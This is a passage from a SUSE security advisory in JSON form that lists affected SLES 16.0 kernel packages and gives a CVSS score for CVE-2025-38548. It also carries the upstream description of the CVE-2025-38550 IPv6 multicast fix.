"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38548"
},
{
"cve": "CVE-2025-38550",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38550"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: mcast: Delay put pmc-\u003eidev in mld_del_delrec()\n\npmc-\u003eidev is still used in ip6_mc_clear_src(), so as mld_clear_delrec()\ndoes, the reference should be put after ip6_mc_clear_src() return.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
